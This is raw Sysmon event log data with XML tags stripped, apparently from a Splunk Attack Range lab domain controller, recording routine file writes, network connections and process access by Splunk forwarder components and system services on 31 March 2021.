Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C6C6036DD8B9E748C1B6E704C6918876,SHA256=F4180F053039FDB987C2ED11A59D84633B60E430A79AC70583CFFDD12D6E1A30,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:52.540{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53675-false10.0.1.12-8000- 23542300x800000000000000010132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:53.486{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=78CBA53FCBC5F0364F4CCB69B78D6175,SHA256=D9D39013F7239E3D84CC185D1FEEDC4B8185906330405C5B55924684DFBEB320,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:53.064{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C6BF97602E33B700EC58D74214C7172,SHA256=D87ED6ED180C510701B2D7A34676A9D923B8D14765308E35C352241DAA807834,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:54.501{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=85E3FEB85393E8F4BBE7D606F91CC83A,SHA256=9D557A178537255783BB5F9183B6258F7E78A051E911C51EBD8FE504D6C1C73E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:54.142{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8DEC284A9456956A72DE146C05FC54D,SHA256=4248477A1D28BBE3F81C17138B4928A118B8B007D0D37FEC4B4BB0B5F69CF136,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:55.204{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCB21D78BEFBDE789B0E013D0AF49483,SHA256=3FDDF9AA89396863369318850AB5926837AAEFFD67C543DE891E0C2F63F81D84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:56.219{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A893BE26D2A4A05015A767F9C6D0E98D,SHA256=D8A0B6BBD824C816819DC815CC1B1CC49CEFC15ED6797DFCC71D961F001CB1B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:57.235{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=096743BC63ADC3704C0643E11AF4CAFE,SHA256=09B5928AA98A2D8E4EC4BB34AE61B4253DB8F0FB4A6F188915E39C3DFE30FBBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:58.422{266CAFBE-65AB-6064-5001-00000000AE01}2456ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5=61F76BFEDDC4BC7370E4A5A5F8B999BB,SHA256=2F5F4F1286A963A44D6182A39D98DC258AC9FAC638E02164495BFE872DB39572,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:58.250{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D7920FE61E0DE8CD874BC0BADE1E956,SHA256=271FF5E93B222B7A7D86516A0458575717C50F48455D5D9083A7BF4E10B0171D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:58.477{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53676-false10.0.1.12-8000- 23542300x800000000000000010141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:59.344{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A376E2935D6FFD3173EC87E941B5E050,SHA256=ABA5AF6892C7A3A674C6246DC227C05FCE2FC24E5C059232E9941E2B8DB01AEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:00.359{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=014B3DFDFAE0DEBF74AB70821EB1403F,SHA256=BB61415CC8A2614193BBDEA543B04AE4F681CB839DE636D8EC0F67EC8F50D2E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:01.374{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A620BEDA81202DC42F57A48C3DE6E54,SHA256=64A3058D2C4710D1164CE2B69F6B0E167F372A6E8B0D48E73759911E5CE43997,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:02.983{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:02.983{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:02.983{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:02.983{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:02.983{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-65E6-6064-5701-00000000AE01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:02.983{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65E6-6064-5701-00000000AE01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:02.984{266CAFBE-65E6-6064-5701-00000000AE01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:02.374{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED9BCE2F73781AC7FEDD64DE16E6489F,SHA256=21E2C2CBF8A1756ACDBD8713B7F1EA933ABCA3E6749F8BF8B3C799F46DD9902B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.936{266CAFBE-65E7-6064-5801-00000000AE01}55367020C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.764{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65E7-6064-5801-00000000AE01}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.764{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.764{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.764{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.764{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.764{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-65E7-6064-5801-00000000AE01}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.764{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65E7-6064-5801-00000000AE01}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.766{266CAFBE-65E7-6064-5801-00000000AE01}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.389{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97D08D3D41A582287B764857409FC620,SHA256=0FD11EC6C3FB9FBB9882185AFB74CD0A4DD10B30C33A2DFA63DCE7826D4B4D6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.030{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65E6-6064-5701-00000000AE01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:04.733{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65E8-6064-5901-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:04.733{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 